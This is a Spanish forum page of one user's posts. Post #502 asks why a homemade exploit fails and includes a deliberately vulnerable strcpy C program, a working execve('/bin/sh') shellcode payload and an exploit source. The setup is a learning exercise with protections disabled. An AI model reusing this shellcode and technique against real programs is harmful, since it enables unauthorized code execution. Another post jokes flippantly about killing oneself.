Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Garfield07

#501
¿? Resetear no tiene ningun peligro. Si tuviesen, por lo que sea acceder al router, no necesitarias pass, porque seria 1234...
Lee todos los comentarios...
Al resetear TODO se pone por defecto... Por defecto un router funciona muy bien.
#502
Bueno, ahi va el titulo, la cosa es que tengo un programita con una vulnerabilidad y lo estoy explotando. El otro dia consegui manejar el transcurso de la aplicacion, y ahora abrir una shellcode...
Lo hago asi:
./vuln [23 NOPS + 25 Shellcode + 4 RET]
La idea la saque de un post antiguo del foro... Evidentemente se puede cambiar la posicion de los Nops, pero bueno...

Bueno, consigo la shellcode al correrlo asi:

./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
$

Pero a la hora de hacer el exploit...

juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c
juanra@Juanra:~/Escritorio/Shell$ ./exploit
Fallo de segmentación
juanra@Juanra:~/Escritorio/Shell$ gdb -q exploit
(gdb) r
Starting program: /home/juanra/Escritorio/Shell/exploit

Program received signal SIGSEGV, Segmentation fault.
0xb77521f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb)


Tengo este codigo, en el que también va como comentario el vulnerable...

/*
First BoF Linux attack : Sagrini 2010 : elhacker.net
23 Nops + 25 Shellcode + 4 Ret = 52 [48 Buffer + Ret] + 7 ["./vuln "] = 59

gcc -o vuln vuln.c --no-stack-protector -g -z execstack
./vuln $(perl -e 'print "\x90"x23 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"."\x18\x1f\x9b\xbf"')
$

gcc -o exploit exploit.c
./exploit
$

------------------------------------------
!!! Vuln code !!!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void soy_vuln(char *arg)
{
char buffer [48];
strcpy (buffer, arg);
}

int main(int argc, char *argv[])
{
if (argc != 2) return 1;
soy_vuln(argv[1]);
}
------------------------------------------
*/

#include <stdio.h>
#include <string.h>

int main ()
{
printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net");

char nops [23];
memset (nops, '\x90', 23);
char shellcode [25] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
char ret [4] = "\x18\x1f\x9b\xbf";

char command [59];
strcpy (command, "./vuln ");
strcpy (command, nops);
strcpy (command, shellcode);
strcpy (command, ret);
execve (command, command, NULL);

return 0;
}



Ahora mi pregunta es... ¿Qué falla?
#503
Para mi C, Java, ASM (siempre sera necesario) y Perl...
Aparte C++, PHP y Pascal...

Es mi humilde opinion, nada mas xD
#504
Citar
sagrini, yo no digo que se haga en batch, he dicho que lo he hecho en Pascal.
Sobre lo que se comenta de batch nose, pero si suplantan un exe por un batch el icono canta que no veas...
fff menos mal es que como estamos hablando con Batch... Ya decia yo...
Yo lo haria en C de todos modos Pascal no me resulta muy conocido  ;)

Sobre el nuevo code... lo has escrito tu? Yo lo haria con APIs de C, que son algo mas extensas... Pero creo que tu code no funciona  :-\ No estamos buscando eso exactamente  :P

Lord RNA podrias enseñarme el code? Es por verlo, si quieres...
@skapunky ahora en un ratillo podria hacer el primer programa en C, y listo...
#505
Cita de: Draklit en 22 Enero 2011, 16:59 PM
Sólo imagina presenciar los conflictos que causa el hombre por diez mil años, y, si los demás son inmortales también, imagina el problema que vendría debido a los nacimientos; si los demás no son inmortales, imagina ver a toda la gente amada morir, volver a amar, y verlos morir de nuevo.

Imagina ver todos los problemas que ves día a día, durante un plazo cien veces más largo. Escuchar las mismas historias de crueldad, ver la brutalidad de eventos que ocurren, y si sufres por alguna causa que no te abandone el resto de la vida, creeme, querrás morir.
+1 algo asi pasa en las pelis de zombis cuando estas solo. Te pegas un tiro y ya está jeje...
Estoy de acuerdo contigo  :)

Yo como he dicho antes me mataria...
#506
Cita de: Xafirot en 22 Enero 2011, 16:23 PM
El universon se creo y yasta es una de esas cosas que nunca sabremos

No estoy de acuerdo, Dios nos ha dado una inteligencia, y no nos ha velado nada. Si alguien lo descubre te digo yo que a Dios no le importara... Es mas, para algo nos ha dado la inteligencia no?
Otra cosa son algunos misterios que si que nunca sabremos, hasta que nos muramos, como la Santisima Trinidad, etc... Eso es porque nuestra inteligencia no nos llega a tanto. Pero algun dia en el cielo lo sabremos  :) mas que nada porque veremos a Dios...
#507
Cierto jeje que raro que
Citar
Fecha de registro:    Hoy a las 03:05:16
Última vez activo:    Hoy a las 03:20:53
De todos modos nos hacen un favor poniendo 20 €. Asi habra menos script-kiddies  :-*
Yo prefiero usar GDB... esa herramienta es como Metasploit  :¬¬
#508
Usas linux u Win32?

Linux --> http://foro.elhacker.net/programacion_general/ehndev_2010_concurso_de_desarrollo_de_aplicaciones_hilo_oficial-t308347.0.html
Windows --> http://www.taringa.net/posts/downloads/6300256/Programas-para-descargar-videos-de-YouTube.html


Porfavor la proxima vez busca antes de preguntar... Hay miles de preguntas asi...
#509
Claro que si, pero eso no signifca que queramos ser inmortales... Evidentemente.
Has pensado en lo que seria no morirte?
#510
Yo no entiendo como puede tener fans siendo tan mal cantante
y como puede ir y decir eso en una accion caricativa? Haces la accion caritativa por decir eso o eso por la accion caritativa?